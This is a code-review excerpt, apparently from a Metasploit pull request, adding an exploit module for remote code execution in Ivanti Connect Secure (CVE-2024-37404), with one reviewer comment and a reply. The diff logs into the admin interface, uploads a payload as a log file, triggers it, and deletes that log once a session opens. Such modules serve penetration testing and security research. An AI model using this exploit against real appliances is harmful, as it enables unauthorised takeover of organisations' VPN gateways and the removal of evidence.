modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_37404.rb

```diff
@@ -0,0 +1,428 @@
+        'stateOrProvinceName' => Faker::Address.state,
+        'countryName' => Faker::Address.country_code,
+        'emailAddress' => Faker::Internet.email,
+        'keytype' => 'RSA',
+        'keylength' => '1024',
+        'eccurve' => 'prime256v1',
+        'random' => rand_text_alphanumeric(5..10),
+        'newcsr' => 'yes',
+        'certType' => 'device',
+        'btnCreateCSR' => 'Create CSR'
+      }
+    }, 1)
+  end
+
+  def exploit
+    unless @logged
+      begin
+        login_admin
+      rescue IvantiError => e
+        fail_with(Failure::NoAccess, "Unable to login to the administrative interface: #{e}")
+      end
+    end
+
+    begin
+      log_filename = upload_payload
+    rescue IvantiError => e
+      fail_with(Failure::Unknown, "Unable to upload the payload: #{e}")
+    end
+
+    begin
+      trigger_payload(log_filename)
+    rescue IvantiError => e
+      fail_with(Failure::Unknown, "Unable to trigger the payload: #{e}")
+    end
+  end
+
+  def delete_log_file
+    print_status('Deleting the log file (payload)...')
+
+    uri = normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
+    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
+    raise IvantiUnknownError, "[delete_log_file] No response from '#{uri}'" if res.nil?
+
+    csrf_token = res.get_html_document.xpath('//form/input[@id="xsauth_60"]/@value').text
+    raise IvantiNotFoundError, '[delete_log_file] Could not find the CSRF token' if csrf_token.empty?
+
+    file_link = res.get_html_document.xpath("//table[@id='table_uploadedlogs_4']//tr/td[contains(text(), '#{@client_component}')]/preceding-sibling::td/a")
+    raise IvantiNotFoundError, '[delete_log_file] Could not find the log file' if file_link.empty?
+
+    href = file_link.attribute('href')&.value
+    if href&.match(/&row=(\d+)/)
+      log_id = Regexp.last_match(1)
+    else
+      raise IvantiNotFoundError, '[delete_log_file] Unable to retrieve the log ID'
+    end
+
+    uri = normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'keep_cookies' => 'true',
+      'headers' => {
+        'Referer' => full_uri('/dana-admin/auth/uploadedlogs.cgi')
+      },
+      'vars_post' => {
+        'xsauth' => csrf_token,
+        'op' => 'del',
+        'row' => log_id
+      }
+    )
+    raise IvantiUnknownError, "[delete_log_file] No response from '#{uri}'" if res.nil?
+
+    if res.code != 302 || res.redirection.to_s != '/dana-admin/auth/uploadedlogs.cgi'
+      raise IvantiUnexpectedResponseError, "[delete_log_file] Unable to delete the log file (status code=#{res.code})"
+    end
+
+    csrf_token
+  end
+
+  def on_new_session(_session)
+    print_status('Cleaning up...')
+
+    begin
+      csrf_token = delete_log_file
+    rescue IvantiError => e
+      print_warning("Unable to cleanup properly, this will need to be done manually: #{e}")
```

Comment:
Could we print out the path of the uploaded log file, so the user knows what to delete?

Reply:
Absolutely, good call! Addressed in [f5ac33e](https://github.com/rapid7/metasploit-framework/pull/19595/commits/f5ac33e3a752703734ce6af70caaa24f5612ac65).